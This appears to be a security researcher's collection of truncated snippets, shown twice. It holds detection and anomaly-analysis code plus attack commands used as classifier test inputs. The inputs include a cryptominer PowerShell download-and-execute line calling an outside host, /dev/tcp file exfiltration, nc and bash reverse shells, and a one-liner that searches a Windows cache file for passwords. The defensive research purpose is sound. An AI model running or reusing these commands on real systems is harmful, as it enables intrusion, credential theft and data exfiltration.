Russ McRee holisticinfosec

## LOLC_CoinMiners.py
# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas

## LOLC_FileUploads.py
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
          'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
          'whois -h $RHOST -p $RPORT base64 $LFILE']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):

## LOLC_ReverseShells.py
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shellc

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -e /bin/sh $RHOST $RPORT',
          'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
          'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):

## rules_windows_nobellium_filedrop.json
[
        {
            "title": "NOBELLIUM FoggyWeb File Drop Sysmon",
            "description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
            "author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
            "tags": [
                "attack.persistence",
                "attack.defense_evasion"
            ],
            "level": "critical",

## sim_toolsmith_demo.xml
<?xml version="1.0" encoding="utf-8"?>
<sim>
	<delete>false</delete>
	<errordirectory>C:\Users\Public\Documents\</errordirectory>
	<task>
		<config>
			<name>PowerShell_test</name>
			<loop>3</loop>
			<pause>1000</pause>
		</config>

## WaitList.dat.ps1
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password"

## Decomposition_Anomalized_Downloads.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
  filter(server == "SERVER549521") %>%
  ungroup() %>%
  time_decompose(count) %>%
  anomalize(remainder) %>%
  plot_anomaly_decomposition() +
  labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")

## SERVER-549521_Anomalies_STL+IQR.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
SERVER549521 %>%
  # STL + IQR Anomaly Detection
  time_decompose(count, method = "stl", trend = "4 months") %>%
  anomalize(remainder, method = "iqr") %>%
  time_recompose() %>%
  # Anomaly Visualization
  plot_anomalies(time_recomposed = TRUE) +
  labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")

## SERVER-549521_Anomalies_Twitter+GESD.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Get only SERVER549521 access
SERVER549521 <- security_access_logs %>%
  filter(server == "SERVER-549521") %>%
  ungroup()
# Anomalize!!
SERVER549521 %>%
  # Twitter + GESD
  time_decompose(count, method = "twitter", trend = "4 months") %>%

## Security_Event_Log_Anomalies.R
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
  # Data Manipulation / Anomaly Detection
  time_decompose(count, method = "stl") %>%
  anomalize(remainder, method = "iqr") %>%
  time_recompose() %>%
  # Anomaly Visualization
  plot_anomalies(time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) +
  labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods")
	# LOLBINS coin miner commands from https://lolbas-project.github.io/
	# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
	# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
	# References:
	# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
	# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/

	from lol.api import LOLC, PlatformType
	lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
	commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas
	# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
	# https://gtfobins.github.io/#+file%20upload

	from lol.api import LOLC, PlatformType
	lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
	commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
	'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
	'whois -h $RHOST -p $RPORT base64 $LFILE']
	classification, tags = lolc(commands)
	for command, status, tag in zip (commands, classification, tags):
	# from GTFOBins: reverse shell examples via nc, gimp, and bash
	# https://gtfobins.github.io/#+reverse%20shellc

	from lol.api import LOLC, PlatformType
	lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
	commands=['nc -e /bin/sh $RHOST $RPORT',
	'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
	'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
	classification, tags = lolc(commands)
	for command, status, tag in zip (commands, classification, tags):
	[
	{
	"title": "NOBELLIUM FoggyWeb File Drop Sysmon",
	"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
	"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
	"tags": [
	"attack.persistence",
	"attack.defense_evasion"
	],
	"level": "critical",
	<?xml version="1.0" encoding="utf-8"?>
	<sim>
	<delete>false</delete>
	<errordirectory>C:\Users\Public\Documents\</errordirectory>
	<task>
	<config>
	<name>PowerShell_test</name>
	<loop>3</loop>
	<pause>1000</pause>
	</config>
	# Created from Anomalize project, Matt Dancho
	# https://github.com/business-science/anomalize
	security_access_logs %>%
	filter(server == "SERVER549521") %>%
	ungroup() %>%
	time_decompose(count) %>%
	anomalize(remainder) %>%
	plot_anomaly_decomposition() +
	labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
	# Created from Anomalize project, Matt Dancho
	# https://github.com/business-science/anomalize
	SERVER549521 %>%
	# STL + IQR Anomaly Detection
	time_decompose(count, method = "stl", trend = "4 months") %>%
	anomalize(remainder, method = "iqr") %>%
	time_recompose() %>%
	# Anomaly Visualization
	plot_anomalies(time_recomposed = TRUE) +
	labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
	# Created from Anomalize project, Matt Dancho
	# https://github.com/business-science/anomalize
	# Get only SERVER549521 access
	SERVER549521 <- security_access_logs %>%
	filter(server == "SERVER-549521") %>%
	ungroup()
	# Anomalize!!
	SERVER549521 %>%
	# Twitter + GESD
	time_decompose(count, method = "twitter", trend = "4 months") %>%